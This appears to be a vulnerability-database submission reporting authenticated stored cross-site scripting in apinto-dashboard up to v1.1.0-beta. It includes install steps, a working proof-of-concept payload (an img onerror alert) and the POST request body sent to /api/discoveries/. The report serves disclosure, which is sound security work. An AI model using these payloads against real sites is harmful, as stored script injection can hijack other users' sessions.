Invia #50340: apinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-betainformazioni

Titoloapinto-dashboard Multiple authenticated store XSS in apinto-dashboard <= v1.1.0-beta
Descrizionerepo: https://github.com/eolinker/apinto-dashboard 1,Download and unzip the installation package Apinto 2,Start gateway 3,Download and unzip the installation package Apinto Dashboard 4,Start Apinto Dashboard ```bash wget https://github.com/eolinker/apinto/releases/download/v0.8.0/apinto-v0.8.0.linux.x64.tar.gz && tar -zxvf apinto-v0.8.0.linux.x64.tar.gz && cd apinto ./apinto start cd .. wget https://github.com/eolinker/apinto-dashboard/releases/download/v1.1.0-beta/apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && tar -zxvf apinto-dashboard-v1.1.0-beta.linux.x64.tar.gz && cd apinto-dashboard ./apinto-dashboard ``` This problem exists in most pages with tables. For example, on the/discoveries/list page, add an item at random and enter `<img src=1 onerror=alert(/xss/)>` in the description Then click Details to trigger. Request URL: /api/discoveries/ Request Method: POST PostData: {"health_on":false,"name":"1<img src=1 onerror=alert(111)>","driver":"static","description":"<img src=1 onerror=alert(222)>"} ![XroR8.png](https://c2.im5i.com/2022/11/01/XroR8.png) ![Xr9Zz.png](https://c2.im5i.com/2022/11/01/Xr9Zz.png) ![Xr3pU.png](https://c2.im5i.com/2022/11/01/Xr3pU.png) ![XrZPw.png](https://c2.im5i.com/2022/11/01/XrZPw.png) Reported by Neppah(@Tomy) from QSec-Team of Cyber Security Department at Qi'anxin Group on 2022-11-01.
Utente
 Tomy (UID 34751)
Sottomissione01/11/2022 12:09 (4 anni fa)
Moderazione01/11/2022 16:47 (5 hours later)
StatoAccettato
Voce VulDB212639 [eolinker apinto-dashboard /api/discoveries/ cross site scripting]
Punti17

PrecedenteVisione D'ensembleIl prossimo

Interested in the pricing of exploits?

See the underground prices here!